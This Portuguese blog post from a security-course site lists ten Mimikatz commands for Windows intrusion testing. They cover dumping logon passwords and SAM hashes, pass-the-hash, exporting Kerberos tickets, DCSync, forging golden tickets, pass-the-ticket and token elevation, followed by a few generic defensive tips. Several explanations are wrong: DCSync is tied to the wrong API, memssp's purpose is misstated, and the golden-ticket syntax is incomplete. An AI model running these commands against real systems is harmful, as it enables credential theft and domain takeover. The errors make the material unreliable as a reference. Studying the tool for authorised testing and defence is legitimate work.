10 Comandos para Testes de Invasão Windows Mimikatz com Orientações para Cibersegurança
No cenário em constante evolução da cibersegurança, as ferramentas e técnicas utilizadas tanto pelos defensores como pelos atacantes estão em constante avanço. Entre a infinidade de ferramentas disponíveis, o Mimikatz se destaca como um utilitário particularmente poderoso e versátil que se tornou um elemento básico nos arsenais tanto de profissionais de segurança quanto de agentes mal-intencionados. Desenvolvido por Benjamin Delpy, o Mimikatz ganhou reputação por sua capacidade de extrair senhas de texto simples, hash, códigos PIN e tickets Kerberos da memória, tornando-o um recurso inestimável para compreender e lidar com roubo de credenciais e escalonamento de privilégios em ambientes Windows.
Dito isso, abaixo separamos para você 10 comandos para testes de invasão Windows Mimikatz com orientações para cibersegurança, vamos lá!
10 Comandos para Testes de Invasão Windows Mimikatz
- privilege::debug
Concede ao processo atual privilégios de depuração,permitindo o acesso a tokens de segurança.
- sekurlsa::logonpasswords
Extrai senhas de logon em texto plano e hashs de senha do sistema Windows.
- sekurlsa::pth /user:<usuário> /domain:<domínio> /ntlm:<hash>
Realiza a técnica “Pass-the-Hash”, autenticando-se em um sistema remoto com um hash de senha.
- sekurlsa::tickets /export
Extrai tickets Kerberos para análise ou uso posterior, incluindo Golden Tickets e Silver Tickets.
- lsadump::sam
Extrai o banco de dados SAM (Security Account Manager), que armazena informações de conta de usuário e senhas em hashes.
- lsadump::dcsync /domain:<domínio>
Obtém hashes de senha de contas de usuário do Active Directory usando a função DRSReplicaGetInfo().
- kerberos::golden /user:<usuário> /domain:<domínio> /sid:<SID>
Gera um Golden Ticket para obter acesso persistente a sistemas Windows.
- kerberos::ptt <caminho do ticket.kirbi>
Passa um ticket Kerberos forjado para o sistema, permitindo acesso como o usuário especificado no ticket.
- token::elevate
Eleva o token de segurança atual para o token mais alto disponível, concedendo privilégios administrativos.
- misc::memssp
Ativa o protocolo de segurança de provedor de serviços de memória (MemSSP) para passar hashes de senha para autenticação.
Orientações gerais
- Divida a rede em segmentos menores e restrinja o tráfego.
- Implemente sistemas de monitoramento de eventos de segurança.
- Estabeleça políticas de senha robustas que exijam senhas longas e complexas
- Limite o acesso aos tokens de segurança
- …e outras medidas.
Confira também: 10 Ferramentas Windows para Cibersegurança
Gostou do conteúdo? Se você deseja aprofundar mais seu conhecimento sobre cibersegurança, confira os nossos cursos disponíveis.